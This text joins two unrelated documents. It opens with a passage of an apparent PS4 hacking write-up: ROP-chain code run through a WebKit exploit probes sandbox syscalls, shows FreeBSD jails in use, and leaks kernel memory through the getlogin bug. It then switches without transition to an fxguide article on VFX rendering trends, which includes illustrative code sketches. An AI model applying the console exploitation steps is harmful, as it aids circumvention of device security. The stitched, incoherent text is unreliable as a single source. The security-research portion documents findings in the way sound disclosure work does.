    We do have access to a lot of interesting stuff though including encrypted save data, trophies, and account information. I will go over more of the filesystem in my next article.

    Sandboxing

    As well as file related system calls failing for certain paths, there are other reasons for a system call to fail.

    Most commonly, a disallowed system call will just return error 1, EPERM, "Operation not permitted", such as when trying to use ptrace; but other system calls may fail for different reasons:

    Compatibility system calls are disabled. If you are trying to call mmap for example, you must use system call number 477, not 71 or 197; otherwise a segfault will be triggered.

    Other system calls such as exit will also trigger a fault:

    chain.syscall("exit", 1, 0);

    Trying to create an SCTP socket will return error 0x2b, EPROTONOSUPPORT, indicating that SCTP sockets have been disabled in the PS4 kernel:

    //int socket(int domain, int type, int protocol);
    //socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
    chain.syscall("socket", 97, 2, 1, 132);

    And although calling mmap with PROT_READ | PROT_WRITE | PROT_EXEC will return a valid pointer, the PROT_EXEC flag is ignored. Reading its protection will return 3 (RW), and any attempt to execute the memory will trigger a segfault:

    chain.syscall("mmap", 477, 0, 4096, 1 | 2 | 4, 4096, -1, 0);
    chain.write_rax_ToVariable(0);
    chain.read_rdi_FromVariable(0);
    chain.add("pop rax", 0xfeeb);  // 0xEB 0xFE is "jmp $", a two byte infinite loop
    chain.add("mov [rdi], rax");   // write it into the newly mapped memory
    chain.add("mov rax, rdi");
    chain.add("jmp rax");          // attempt to execute it

    The list of open source software used in the PS4 doesn’t list any kind of sandboxing software like Capsicum, so the PS4 must use either pure FreeBSD jails, or some kind of custom, proprietary, sandboxing system (unlikely).

    Jails

    We can prove that FreeBSD jails are actively used in the PS4’s kernel, because the auditon system call cannot complete from within a jailed environment:

    chain.syscall("auditon", 446, 0, 0, 0);

    The first thing the auditon system call does is check, here, whether the calling process is jailed, and if so, return ENOSYS:

    if (jailed(td->td_ucred))
        return (ENOSYS);

    Otherwise the system call would most likely return EPERM from the mac_system_check_auditon here:

    error = mac_system_check_auditon(td->td_ucred, uap->cmd);
    if (error)
        return (error);

    Or from the priv_check here:

    error = priv_check(td, PRIV_AUDIT_CONTROL);
    if (error)
        return (error);

    The absolute furthest that the system call could reach would be immediately after the priv_check, here, before returning EINVAL due to the length argument being 0:

    if ((uap->length <= 0) || (uap->length > sizeof(union auditon_udata)))
        return (EINVAL);

    Since mac_system_check_auditon and priv_check will never return ENOSYS, having the jailed check pass is the only way ENOSYS could be returned.

    When executing the chain, ENOSYS is returned (0x48).

    This tells us that whatever sandbox system the PS4 uses is at least based on jails because the jailed check passes.

    FreeBSD 9.0 kernel exploits

    Before trying to look for new vulnerabilities in the FreeBSD 9.0 kernel source code, we should first check whether any of the kernel vulnerabilities already found could be used on the PS4.

    We can immediately dismiss some of these for obvious reasons.

    However, there are some smaller vulnerabilities which could lead to something:

    getlogin

    One vulnerability which looks easy to try is using the getlogin system call to leak a small amount of kernel memory.

    The getlogin system call is intended to copy the login name of the current session to userland memory, however, due to a bug, the whole buffer is always copied, and not just the size of the name string. This means that we can read some uninitialised data from the kernel, which might be of some use.

    Note that the system call (49) is actually int getlogin_r(char *name, int len); and not char *getlogin(void);.

    So, let’s try copying some kernel memory into an unused part of userland memory:

    chain.syscall("getlogin", 49, chain.data, 17);

    Unfortunately 17 bytes is the most data we can get, since:

    Login names are limited to MAXLOGNAME (from <sys/param.h>) characters, currently 17 including null.

    After executing the chain, the return value was 0, which means that the system call worked! An excellent start. Now let’s take a look at the memory which we pointed to:

    Before executing the chain:

    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00

    After executing the chain:

    72 6f 6f 74 00 fe ff ff 08 62 61 82 ff ff ff ff
    00

    After decoding the first 4 bytes as ASCII:

    root

    So the browser is executed as root! That was unexpected.

    But more interestingly, the memory leaked looks like a pointer to something in the kernel, which is always the same each time the chain is run; this is evidence to support Yifanlu’s claims that the PS4 has no Kernel ASLR!

    Summary

    From the information currently available, the PS4’s kernel seems to be very similar to the stock FreeBSD 9.0 kernel.

    Importantly, the differences that are present appear to be from standard kernel configuration changes (such as disabling SCTP sockets), rather than from modified code. Sony have also added several of their own custom system calls to the kernel, but apart from this, the rest of the kernel seems fairly untouched.

    In this respect, I’m inclined to believe that the PS4 shares most of the same juicy vulnerabilities as FreeBSD 9.0’s kernel!

    Unfortunately, most kernel exploits cannot be triggered from the WebKit entry point that we currently have due to sandboxing constraints (likely to be just stock FreeBSD jails).

    And with FreeBSD 10 being out, it’s unlikely that anyone is stashing away any private exploits for FreeBSD 9, so unless a new one is suddenly released, we’re stuck with what is currently available.

    The best approach from here seems to be reverse engineering all of the modules which can be dumped, in order to document as many of Sony’s custom system calls as possible; I have a hunch that we will have more luck targeting these, than the standard FreeBSD system calls.

    Recently Jaicrab has discovered two UART ports on the PS4 which shows us that there are hardware hackers interested in the PS4. Although the role of hardware hackers has traditionally been to dump the RAM of a system, like with the DSi, which we can already do thanks to the WebKit exploit, there’s also the possibility of a hardware triggered kernel vulnerability being found, like geohot’s original PS3 hypervisor hack. It remains most likely that a kernel exploit will be found on the PS4 through system call vulnerabilities though.

    Thanks

    • flatz
    • SKFU
    • droogie
    • Xerpi
    • bigboss
    • Hunger
    • Takezo
    • Proxima
    The State of Rendering – Part 1


    Part 1 of 2. This part deals with the rendering trends in the VFX industry today. Part 2 includes a run down of 14 of the most popular renderers for VFX. Many of the issues in this special two part series will also be covered in more depth in the July term at fxphd.com.

    Introduction: which renderer?

    Each Tuesday at ILM in the Presidio in San Francisco, at the former military base on the northern tip of the San Francisco Peninsula overlooking the Golden Gate Bridge, there is a lunch for all the ILM visual effects supervisors. It is a private lunch where they get to discuss anything and everything. ILM has an incredible wealth of visual effects supervisors with an astonishing collection of both Oscars and technical landmark innovations. “It is great. It is one of the great things about the company,” says supervisor Ben Snow.

    Rendering often comes up in conversations. While that may not be a topic most directors focus on, it is these people and their respective leads on projects who must decide how they will achieve the incredible shots they bid, often with unparalleled realism on ever tighter budgets. ILM has a full site license of RenderMan and for many years primarily used it as their renderer, especially on creature work. But, as Snow explains, “we have had a lot of discussion at the supervisor level that we want to be renderer agnostic. If someone wants to use Arnold they should be able to. If I want to use RenderMan I should be able to.”


    Pacific Rim. This shot rendered in Arnold at ILM.

    ILM is not alone in seeing rendering as something in need of constant evaluation and far from a simple solution. Right now, ILM alone uses a range of renderers from Arnold to RenderMan to V-Ray to newer tools like Modo.

    As Snow described to fxguide, he had told the team at Pixar earlier that day, “I am old school ILM – and we were RenderMan people – almost RenderMan chauvinist actually. So I have always been a little bit biased towards them. On Pearl Harbor where we thought GI was the answer we worked hard to try and get it to work in Mental Ray and on Iron Man we looked at Mental Ray, to see if we could match the suits when shared with another vendor.” In the end they used RenderMan.


    Star Trek: Into Darkness. This image rendered in Arnold at ILM.

    "All renderers have strengths and weaknesses and different departments here at ILM use different renderers," adds Snow. "Arnold became the next big thing and we were looking at that on the last few shows. But I have to say on the last few films we have really been jumping around on renderers. And in each case we have been porting the shader set between the renderers." For example, Arnold was used on Star Trek: Into Darkness, Pacific Rim and The Lone Ranger this year at ILM, along with other renderers.


    While RenderMan is the ‘gold standard’ by which other production renderers are judged, Arnold has certainly got the reputation as perhaps the fastest production renderer for many styles of projects – a point made to fxguide by not one but several of their competitors.

    People can be very religious about their renderers!

      Mark Elendt
      Mantra, Side Effects Software

    But beyond these two big players, there is an amazing number of production renderers and people are very passionate about which they prefer. And many of these other renderers are exceptionally good. V-Ray has been even more widely embraced than Arnold for its quality, speed, and more open community approach. Most people agree that Maxwell can often be used as a ground truth because of its dedicated light simulator approach and incredible accuracy. Once upon a time the renderers that shipped with applications were only used by those who could do no better, but Mantra and Modo’s renderer, for example, have gained real acceptance in their own right. And there are a host of newer renderers, some challenging GPU v CPU, others completely cloud based and no longer even rendering previews from the desktop.


    An advanced Maxwell Render showing caustics.

    In this article – a follow-up to fxguide’s extraordinarily popular Art of Rendering piece – we explore the state of play with renderers in the visual effects and animation fields. Part 1 provides background on the issues of the day, while Part 2 highlights each major renderer in some detail based on interviews done exclusively with each company. We also take a brief look at the future and ask whether the whole approach itself is flawed.


    1. Issues of the day

    “Each pixel is just a single color but to come up with that color you have to look at the entirety of the environment.”

      Rob Cook
      Pixar RenderMan co-founder

    In this first section we highlight the primary issues in the area of rendering. This year RenderMan celebrates 25 years (and fxguide has a special feature on the history of RenderMan coming up). Rob Cook, co-architect and author of Pixar’s RenderMan, described rendering to fxguide as “each pixel (on the screen) is just a single color but to come up with that color you have to look at the entirety of the environment inside that pixel.”

    Cook published in 1984 a key ray tracing paper that set up the idea of randomly sampling to reduce aliasing and artifacts. The paper is one of the landmark advances in ray tracing, and when the RenderMan spec was first published it accommodated ray tracing as a possible render solution. This is remarkable given that for many years Pixar’s own PRman implementation would not use ray tracing, as it was considered far too computationally expensive, and yet today – nearly 29 years after Cook’s paper – Pixar’s Monsters University was fully ray traced, using at its core the principles of that paper.

    The rendering equation was presented by James Kajiya in 1986. Path tracing was introduced as an algorithm to find a numerical solution or approximation to the integral of the rendering equation. A decade later, Lafortune suggested many refinements, including bidirectional path tracing. Metropolis light transport, a method of perturbing previously found paths in order to increase performance for difficult scenes, was introduced in 1997 by Eric Veach and Leonidas J. Guibas.

    The original rendering equation of Kajiya adheres to three particular principles of optics:

    1. the principle of global illumination,
    2. the principle of equivalence (reflected light is equivalent to emitted light), and
    3. the principle of direction (reflected light and scattered light have a direction).
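    For reference, the rendering equation is usually written in the following form, where L_o is the outgoing radiance at a point x in direction ω_o, L_e is the emitted radiance, f_r is the BRDF, L_i is the incoming radiance and n is the surface normal:

    L_o(x, \omega_o) = L_e(x, \omega_o) + \int_{\Omega} f_r(x, \omega_i, \omega_o) \, L_i(x, \omega_i) \, (\omega_i \cdot n) \, d\omega_i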

    From informally surveying the industry, fxguide has identified some of the key trends in the following areas:

    1.1. GI
    1.2 Ray Tracing vs point solutions
    1.3 Image-based Lighting
    1.4 Interactivity
    1.5 GPU
    1.6 Farm and cloud rendering
    1.7 Open source


    1.1 GI

    While there is a great amount of work being done in non-realistic rendering, especially in Japan, the overwhelming trend is to more realistic rendering. This means rendering with global illumination and providing images with bounce light, color bleeding, real world light samples, and – increasingly – the use of physically plausible shaders and lights.

    The most widely used methods for GI are distribution ray tracing, path tracing, and point-based global illumination. Each of these has their advantages and limitations, both from a technical point of view and from the complexity they force upon the lighting artist or TD setting up the shot.


    Monsters University: rendered in RenderMan by Pixar.

    The first use of global illumination in a feature-length movie, as noted in a recent paper (Multiresolution Radiosity Caching for Efficient Preview and Final Quality Global Illumination in Movies, 2012, Per H. Christensen et al.), was for the movie Shrek 2. Here, PDI/DreamWorks computed direct illumination and stored it as 2D texture maps on the surfaces, and then used distribution ray tracing to compute single-bounce global illumination.


    As the paper points out the use of 2D textures requires the various surfaces in the scene to be parameterized. “The irradiance atlas method is similar, but uses 3D texture maps (“brick maps”) so the surfaces do not need a 2D parameterization. Both methods use two passes: one pass to compute the direct illumination and store it (as 2D or 3D texture maps), and one pass for final rendering.” Irradiance maps are baked and not generated per frame as Sam Assadian from Clarisse iFX points out. “Irradiance maps flicker with low frequency noise – the worse kind.” By rendering once and storing the value, rendering is faster overall and consistent over time (temporally stable).

    Path tracing is a form of ray tracing: a brute-force, unbiased global illumination method that was first seen via the Arnold renderer in Monster House from Sony Pictures Animation. The advantages of path tracing are that it does not rely on complex shaders nearly as much as a biased or point cloud approach. Given the way a path tracer renders, it can provide fast feedback during interactive lighting design. The problem with all ray tracers is noise. At the basic level, to halve the noise you need to quadruple the number of rays. The promise, mathematically, of unbiased ray tracing is that given enough rays it will converge to a correct solution. Ray tracing is built on probability: if you fire enough rays, instead of merely sampling and estimating the result, the variance is reduced to 0 and the solution converges to the correct result. Of course, firing an infinite or extremely large number of complex rays is not viable, especially with the nonlinear noise curve, so one has only three options:

    • use a different clever solution – like brick maps and say a scan line renderer or a partial ray tracing solution

    • write really fast and clever code that renders very quickly i.e. fast clever rays

    • aim the majority of your rays where they matter the most i.e. aim those fast clever rays better
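    As a side note on the noise figure quoted above: the standard error of a Monte Carlo estimate falls off with the square root of the number of samples,

    \text{noise} \propto \frac{\sigma}{\sqrt{N}}

    so reducing the noise by a factor of two requires roughly four times as many rays.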

    At the core of the ray tracing scheme is the notion of solving a lighting problem using samples, normally random samples decided by a probability distribution function, but to get GI you also need to think about what other rays are fired off due to the material (the shader/BRDF etc) and how you sample the lights, or rather anything that will contribute light. From working on set we all know you can light with a bounce card, so every object in a scene catches bounce light; the biggest example of this is lighting with a giant light dome, or what is known as image based lighting. In image based lighting a dome or sphere is mapped with an image, normally an HDR image. The whole dome or sphere contributes light to everything inside it, which is again why sampling this massive spherical light sensibly is important. After all, we are trying to do nothing less than recreate the world in all its lighting complexity, and how every part of it affects every other part.

    Within such a sphere it is easy to think of the energy bouncing around in the form of light, which should all add up. In other words, if a light bounces off a table, the bounce light would never be more than the light coming from the light source; and if one moves the light further away, the bounce would not only seem less strong, it would actually reduce according to the inverse square law. We all know this from moving any light in the real world. This idea of correct light behavior and correct material behavior is what is being referred to by “physically plausible lighting and shaders”. (For this article we will use the more relaxed terms physical lighting and physical shaders, but they are of course nearly always just a very close approximation.)

    Do you have to use ray tracing and physical lights and shaders? Absolutely not.

    Millions of frames of animation and effects have been produced without either, but the trend is towards both; not for everything, but in the world of VFX and animation it is the dominant direction. We will try to highlight non-ray-tracing solutions, and there are many, but the state of the art today is centered around a "rays race" to produce better results that are easier to light and yet do not explode memory and render budgets.


    GI Joe: Retaliation. This image rendered in V-Ray at ILM.

    One of the biggest disadvantages of ray tracing is its memory requirements. One of the remarkable historical aspects is that RenderMan, in order to beat the RAM budget of 25 years ago and allow anything of any complexity to be rendered, still today contains both a REYES scan line renderer and a ray tracing hider. RenderMan is remarkable not only for its successful history but for the sheer success of its founding scientists’ vision in defining a spec – an approach that could still be valid today, and would be as forward looking as it was then. We will cover some of that history below, but today RenderMan stands alongside Arnold, V-Ray, Maxwell, and newer programs like the cloud based Lagoa and the GPU based Octane renderers as a program that is trying to render faster and more accurate ray traced images in an ever more competitive environment.


    Maxwell Render with SSS.

    How competitive? Since we wrote the first Art of Rendering story, just 18 months ago, the landscape has changed dramatically. New renderers and whole new approaches have been released. There have been dramatic improvements, renderers have died, others have been bought, and there is no sense that the process is anywhere near over. Rendering, once a fairly predictable evolutionary space, has become a quickly moving landscape. For this story alone we have done over 20 interviews and we will be covering 14 major production rendering platforms. We have aimed to focus on production renderers for animation and VFX, and not really touch on game engine rendering, GPU-only tools or mobile offerings. Art of Rendering drew many compliments but also a host of complaints. To paraphrase a quote from the first article, "rendering is now a bit like a religion."


    1.2 Ray tracing vs point solutions

    Ray tracing is only one approach to GI and its main rival is point-based global illumination. Actually the terms are confusing as strictly speaking one can have a non-fully ray traced solution that still involves some firing of rays. But for now let’s consider ‘ray tracing’ to mean fully unbiased ray tracing or path tracing.

    Before discussing ray tracing it is important to understand how point based GI works, as many solutions in the real world use a combination of results. For example, in Pixar's latest feature Monsters University, the film moved to primarily ray tracing and physically based lighting and shading, but for sub surface scattering (SSS) it still used a point based solution (although that will not be true of the next Pixar feature). SSS is the way light softens beneath the skin as the red wavelengths in particular scatter, producing the waxy look of skin versus the flat look of plastic. SSS is key to character animation and is not new – for example, Joe Letteri (senior VFX supervisor, Weta Digital) used it extensively in the original Lord of the Rings films (see this 2004 fxg interview) and it was key to the original ground breaking look of Gollum. But SSS is very expensive and hard to achieve in a brute force ray tracer, yet very achievable using a point based solution.


    Weta Digital’s Joe Letteri talks to fxguide about the advent of physically based lighting and rendering at his studio.

    Point-based GI is relatively new in its own right and it is fast. Plus, unlike ray tracing, it produces noise-free results. “It was first used on the movies Pirates of the Caribbean 2 and Surf’s Up, and has since been used for more than 40 other feature films” (2012 Per H. Christensen et al.)

    Point-based GI is a multi-pass method:

    • In the first pass, a point cloud is generated from directly illuminated micropolygons
    • In the second pass, n−1 bounces of GI are computed for the point cloud. (The 2nd pass can be skipped if only a single bounce is needed)
    • In the third pass, the indirect illumination from the point cloud is computed and rendered

    Due to its multi-pass nature, a point-based method is not suitable for interactive lighting design. The latest version of this approach from Pixar is outlined in the 2012 Per H. Christensen paper. It is based on storing post-shading radiosity values from grids of micropolygon vertices. By caching the radiosity, the Pixar team captured and reused both direct and indirect illumination and reduced the number of shader evaluations. By shading a grid of points together rather than shading individual points, their approach was suitable for REYES-style SIMD shader execution (non-ray traced, in other words). The authors noted that their method was similar to Greg Ward's irradiance cache approach, Greg Ward being a true pioneer in many areas of radiosity and HDRs (see our fxg Art of HDR story from 2005).

    At the time of beginning MU, Pixar had been planning a non-fully-ray-traced solution, the problem being that ray traced GI in production meant MU scenes with huge geometry and complex shaders. The Pixar team saw the bottleneck not as the 'raw' ray tracing time, but the time spent evaluating:

    • the displacement,
    • light source, and
    • surface shaders at the ray hit points. Note: the shader evaluation time includes texture map lookups, procedural texture generation, shadow calculation, BRDF evaluation, shader set-up and execution overhead, calls to external plug-ins, etc.

    The point solution meant “we reduce this time by separating out the view-independent shader component — radiosity — needed for global illumination and caching it. During distribution ray tracing global illumination these radiosities are computed on demand and reused many times. As a by-product of caching these shading results, the number of shadow rays is reduced.”

    The radiosity cache is implemented in Pixar’s PhotoRealistic RenderMan renderer that supports both progressive ray tracing and REYES-style micropolygon rendering. The cache contains multiple resolutions of the radiosity on the surface patches in the scene.

    “The resulting single-pass global illumination method is fast and flexible enough to be used in movie production, both for interactive material and lighting design and for final rendering. Radiosity caching gives speed-ups of 3x to 12x for simple scenes and more than 30x for production scenes,” notes the 2012 paper. Indeed, at the 2012 RenderMan User Group, incredibly impressive comparisons were shown between earlier approaches and the new RenderMan approach.
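
    The caching idea can be illustrated with a small, purely hypothetical Python sketch: view-independent radiosity is computed once per surface patch (and resolution) on demand, then reused by later ray hits instead of re-running the expensive shader evaluation. The expensive_shade() function here is a stand-in, not Pixar's code:

```python
from functools import lru_cache

def expensive_shade(patch_id, resolution):
    # Placeholder for the costly part: texture lookups, shadows, BRDF evaluation...
    print(f"  shading patch {patch_id} at resolution {resolution}")
    return 0.42  # pretend this is the view-independent radiosity

@lru_cache(maxsize=None)
def cached_radiosity(patch_id, resolution):
    # Computed the first time a ray hits this patch, reused for every later hit.
    return expensive_shade(patch_id, resolution)

if __name__ == "__main__":
    hits = [("wall", 1), ("wall", 1), ("floor", 2), ("wall", 1), ("floor", 2)]
    total = sum(cached_radiosity(p, r) for p, r in hits)
    print("indirect contribution:", total)  # expensive_shade ran only twice
```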

    So why try to move to ray tracing at all? If other clever methods produce results that are orders of magnitude faster, why even explore fully ray traced solutions, and how can ray tracing be made to render as fast as possible? What is even more interesting is that even on Pixar's own MU, the point solution was only used for SSS (with a method that used Jensen's now famous dipole solution, or a version of it, which models SSS as diffusion: the appearance at a given point is the integral over the surface of the product of a diffusion kernel and the irradiance, the incident illumination, on the surface). Why did Pixar even go near fully ray traced on MU?
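
    As a rough illustration of that diffusion integral (a hedged, heavily simplified sketch, not Pixar's implementation), the outgoing light at a point can be approximated by summing, over nearby surface samples, a falloff kernel times the irradiance arriving at each sample:

```python
import math

def diffusion_kernel(distance_mm, scatter_length_mm=3.0):
    # Hypothetical falloff: light entering nearby contributes more than light far away.
    return math.exp(-distance_mm / scatter_length_mm)

def subsurface_at(point, surface_samples):
    # surface_samples: list of (position, irradiance, area) tuples gathered on the skin.
    total = 0.0
    for position, irradiance, area in surface_samples:
        d = math.dist(point, position)
        total += diffusion_kernel(d) * irradiance * area
    return total

if __name__ == "__main__":
    samples = [((float(x), 0.0), 1.0, 0.5) for x in range(0, 10)]  # toy strip of skin
    print("SSS estimate at origin:", round(subsurface_at((0.0, 0.0), samples), 3))
```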

    1.2.1. Physically Plausible Lighting and Shading

    The overriding trend at the moment is the move to a physically based shading and lighting model. Marcos Fajardo of Solid Angle – the company behind Arnold – remarked that every (production) studio in the world has either moved over to working this way or is in the process of moving now. "That is happening right across the industry, every single company you talk to is either in the middle of it or has already moved, and this is something I have been working towards for the last ten years or so, so I am really happy to see that happening – finally." Fajardo should be credited as one of the greatest advocates and enablers of this massive shift in the industry. Solid Angle is very much at the forefront of the industry-wide move to path traced GI with physically plausible lighting and shading in a production environment (meaning in a cost effective way, on ever tighter schedules).

    Central to the popularity of path traced, unbiased ray tracing is the desire to make life simpler for lighting artists while making the pictures even more realistic.

    In some older pipelines an artist could be handed a setup with a few hundred lights, plus extremely complex shaders – each its own C++-style box of clever tricks built to pull off whatever was needed. Lighters would sometimes have to sit and turn lights on and off just to work out what everything was doing.

    Most companies would not claim that implementing physical lights and shaders made the rendering faster per se, but quite a few believe it makes the artist's role much easier, and frankly artist hours are more expensive than render hours by several orders of magnitude.

    Image from Iron Man 2.

     

     

    But energy conservation and physical lights and shaders are not limited to the new path tracing renderers. ILM adopted this approach some time ago with Iron Man 2. (See our lengthy interview with ILM's Ben Snow from 2011.)


    As that story recounted, the process actually started on the film before Iron Man 2 – it started on Terminator: Salvation:

    Terminator used a new more normalized lighting tool, not on every shot but on a couple of big hero sequences. The move to the new tool did spark somewhat of a holy war at ILM. Many of the team were happy with the tools and tricks that they had, and in fairness were using very effectively. So in the end the approach on Terminator was a hybrid and many of the cheat tools that artists knew and loved were enabled so that people could still use those tools on the film, and tweak lights in a way that was not physically correct.

    The team at ILM implemented for Iron Man 2 a system of energy conservation:

    The new system uses energy conservation which means that lights behave much more like real world lights. This means that the amount of light that reflects or bounces off a surface can never be more than the amount of light hitting the surface.

    For example, in the traditional world of CG the notions of specular highlight and reflection were separate controls and concepts, as were diffuse and ambient light controls. Under the previous model, if you had three lights pointing down (three beams, one from each spot to a surface below) and the specsize was varied, the specular from the point light did not get darker as the specsize increased. "Indeed the specular model we have been using for years at ILM actually gets much brighter with grazing angles, so the actual specular values are very hard to predict," says Snow.


    Old lighting tool (ILM)

    Energy conservation tool (ILM)


    Under the new energy conservation system, the normalized specular function behaves in the same way that a reflection does: as the specsize increases, the intensity of the specular goes down. Previously the system required the artist to know this and dial down the specular as the highlight got broader. While a good artist would know to do this, it had to be dialed in during look development, and different materials on the same model might behave differently; of course objects would also behave differently in different lighting environments and had to be hand tweaked in each setup.
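
    A hedged sketch of the idea (a generic normalized Blinn-Phong-style lobe, not ILM's actual shader): the normalization factor ties the peak intensity to the width of the highlight, so a broader highlight automatically gets dimmer and the total reflected energy stays roughly constant:

```python
import math

def specular_lobe(cos_half_angle, spec_size):
    # spec_size in (0, 1]: bigger value = broader highlight.
    # Map the size to a Blinn-Phong style exponent.
    exponent = max(1.0, 1.0 / spec_size ** 2)
    # The (exponent + 2) / (2*pi) normalization keeps the lobe roughly energy
    # conserving: as the highlight broadens, its peak automatically dims.
    normalization = (exponent + 2.0) / (2.0 * math.pi)
    return normalization * max(0.0, cos_half_angle) ** exponent

if __name__ == "__main__":
    for size in (0.05, 0.1, 0.2, 0.4):
        peak = specular_lobe(1.0, size)  # looking straight down the highlight
        print(f"spec size {size:4.2f} -> peak intensity {peak:10.2f}")
    # No artist needs to remember to dial the specular down as it gets broader.
```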

    This ground breaking work started a fire that has spread throughout the industry. Now entire rendering systems are being set up that allow only for physically based lighting and shading.

    But the system did something else, it accelerated the work ILM was doing with IBL. See below.

    1.2.2. Importance sampling and multiple importance sampling (MIS)

    If you do move to a ray tracing system as described above, one of the key things to do is, as we stated, "aim those fast clever rays better." But what does that mean?

    Given that a large number of rays are going to be needed to solve some parts of the scene successfully, it is ideal to increase sampling where and when you need it while not wasting effort where you don't. This is the art of importance sampling (IS): as the name implies, sampling where it is important.

    There are four levels of IS at the moment in the industry:

    1. undirected brute force renderers which do not have IS 
    2. renderers that have it for just say environment lights or dome lights: environment sampling eg. Modo
    3. renderers that have it for both lights and materials and intelligently balance the two: multiple importance sampling (MIS) – this could arguably be considered ‘state of the art’, eg RenderMan
    4. advanced MIS – applying IS to a range of other solutions as well such as SSS eg. Arnold
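
    As a concrete (and deliberately simplified, hypothetical) example of level 2 above, environment sampling usually means picking directions on the dome with probability proportional to how bright the map is in that direction, then dividing each sample by its probability so the estimate stays unbiased:

```python
import random

def sample_environment(texel_luminance, texel_cosine, num_samples):
    # texel_luminance: brightness of each region of the HDR dome.
    # texel_cosine: how much each region faces the surface (0..1).
    total = sum(texel_luminance)
    pdf = [l / total for l in texel_luminance]          # pick bright regions more often
    picks = random.choices(range(len(pdf)), weights=pdf, k=num_samples)
    # Monte Carlo estimate: average of integrand / pdf, which keeps the result unbiased.
    estimate = sum(texel_luminance[i] * texel_cosine[i] / pdf[i] for i in picks) / num_samples
    return estimate

if __name__ == "__main__":
    random.seed(1)
    dome = [0.01] * 98 + [50.0, 200.0]   # mostly dim sky plus two hot light sources
    facing = [1.0] * 99 + [0.5]          # the hottest light is at a grazing angle
    exact = sum(l * c for l, c in zip(dome, facing))
    print("importance sampled:", round(sample_environment(dome, facing, 64), 2))
    print("exact answer:      ", round(exact, 2))
    # Most samples land on the hot texels, where they matter the most.
```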

    The concept of MIS is not new. Eric Veach first discussed it in his Ph.D. dissertation at Stanford University in December 1997, followed by a key SIGGRAPH presentation the next year. So key is this work that Arnold founder Marcos Fajardo says he re-reads it every year or two, "…and ever since he published it, every single researcher has been reading that thesis – which is amazing by the way," points out Fajardo. Veach's understanding of rendering is remarkably deep, and all the more remarkable is the 1997 publication date. (As an aside, Veach went on to Google to develop algorithms for AdSense and made millions of dollars, according to Fajardo, who could not be happier to see Veach rewarded.)

    Key implementations of this ground breaking MIS work in current renderers have been done by Christophe Hery while at ILM, with Simon Premoze (who was a research engineer at ILM, then at Dneg until recently). Premoze has since given courses at SIGGRAPH, and MIS has become a critical part of rendering with ray tracing.

    Christophe Hery implemented the MIS used on MU, and it worked off the "power 2" formula (the power heuristic with exponent 2), also from Veach's original Ph.D. Interestingly, this is one of the few occasions in recent times where the software used internally by Pixar was slightly out of step with the public RenderMan. Far from being a deliberate withholding, it seems Pixar almost over-ran the RenderMan team's schedule of implementation, but this is now getting back in sync, such was the dramatic nature of the adjustment to the new approach. (You can learn more about the physically plausible shaders in MU in our 2013 fxguide article here.)
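
    A hedged sketch of that combination (textbook Veach, not Pixar's code): each strategy's sample is weighted by the power heuristic with exponent 2, so whichever strategy is better at a given shading point automatically dominates the estimate:

```python
def power_heuristic(pdf_a, pdf_b, beta=2.0):
    # Veach's power heuristic: weight for a sample drawn from strategy A
    # when strategy B could also have produced the same direction.
    a, b = pdf_a ** beta, pdf_b ** beta
    return a / (a + b) if (a + b) > 0.0 else 0.0

def combine_light_and_brdf(light_sample, brdf_sample):
    # Each sample is (value, pdf_under_light_sampling, pdf_under_brdf_sampling).
    value_l, pdf_l_l, pdf_b_l = light_sample
    value_b, pdf_l_b, pdf_b_b = brdf_sample
    w_light = power_heuristic(pdf_l_l, pdf_b_l)
    w_brdf = power_heuristic(pdf_b_b, pdf_l_b)
    return w_light * value_l / pdf_l_l + w_brdf * value_b / pdf_b_b

if __name__ == "__main__":
    # Tiny hot light: light sampling finds it easily, BRDF sampling rarely does.
    light_sample = (5.0, 0.8, 0.01)
    brdf_sample = (0.2, 0.8, 0.05)
    print("MIS estimate:", round(combine_light_and_brdf(light_sample, brdf_sample), 3))
```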

    To understand the power of MIS one need only refer to the original Veach doctorate – which is still as relevant today.

    Below is a picture from that thesis showing, on the left, IS favoring the material's BRDF samples; on the right, it favors the lights in terms of sampling. There are 5 lights in both shots, which use the same set-up apart from the IS settings: four lights along the back of shot and one overhead, just so we can see what is in our space. If we ignore the top light, the back four lights are all of equal energy, so as the size of each light gets bigger it appears to dull from bright white. In front are four panels angled to reflect the lights behind; the back panel is glossy, the front panel is much more diffuse.



    Notice how, when favoring the BSDF, the tiny hot light on the left is poorly sampled, so on the rough bottom plate at the bottom left the result is very noisy; yet in the same BSDF-favoring render the big light on the right is reflected well, as it is large and easily found from the higher sampling of the material. By contrast, if we favor the light sampling, the rough surface produces a nice spread-out light effect from the hot tiny light, but the big light on the right is very noisy. Clearly we want to sometimes favor the BRDF (BSDF) and sometimes the lights – it depends on how diffuse the surface is and how big the lights are.

    Thankfully, this is exactly what MIS does. So much so that it is hard to replicate this result with some modern renderers, since the latest version of RenderMan virtually restrains one from making the render this bad (by using MIS), and similarly in Arnold; but you can get close by manually adjusting settings in V-Ray (this is not to say V-Ray is in any way inferior – far from it – all renderers aim not to produce such noisy, clearly 'wrong' renders).

    Amid Rajabi produced this version below for fxguide in V-Ray by manipulating both the light/BRDF samples and V-Ray’s adaptive DMC (Deterministic Monte Carlo Sampling).



    The results are easy to see even in the small form shown in the article, but if you click on the image above and look at the larger version the difference is even easier to see.

    (Note: due to the clipping of an 8 bit image the 4 key lights ‘appear’ to be the same brightness no matter their size but in the floating point render output they fall off in value as they get bigger in size along the back of each of these images.)

    Here is an example of the difference using importance sampling inside Otoy’s Octane GPU renderer.

    src="http://www.youtube.com/embed/OJ-N9_5lDEE" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Rendered in real-time with OctaneRender standalone 1.20 on 1 GTX 680 + 1 GTX Titan using path traced sub surface scattering. Head model scanned with LightStage, containing over 17M triangles.


    1.3 Image-based lighting

    IBL started a while ago with a combination of new on-set light probe sampling and various dome lights, and there has since been real growth in its use alongside physically based lighting and shading.

    In MU, not only did the animation unit of Pixar move to physical lights and shaders, they also used IBL lighting, which is perhaps odd as it historically has been used for sampling real world ‘on location’ lighting and using it to match CG elements into that location.

    1.3.1 Pixar MU experience – and Splat

    fxguide recently interviewed Christophe Hery, Global Tech and Research TD at Pixar, about Monsters University and the IBL tools they developed, as he was a key part of the team that moved Pixar to a near fully ray traced, physically based shader and lighting solution – one which used IBLs. In addition to the comments in that original story, Hery discussed the new Splat tool with us.


    Monsters University: rendered in RenderMan at Pixar.

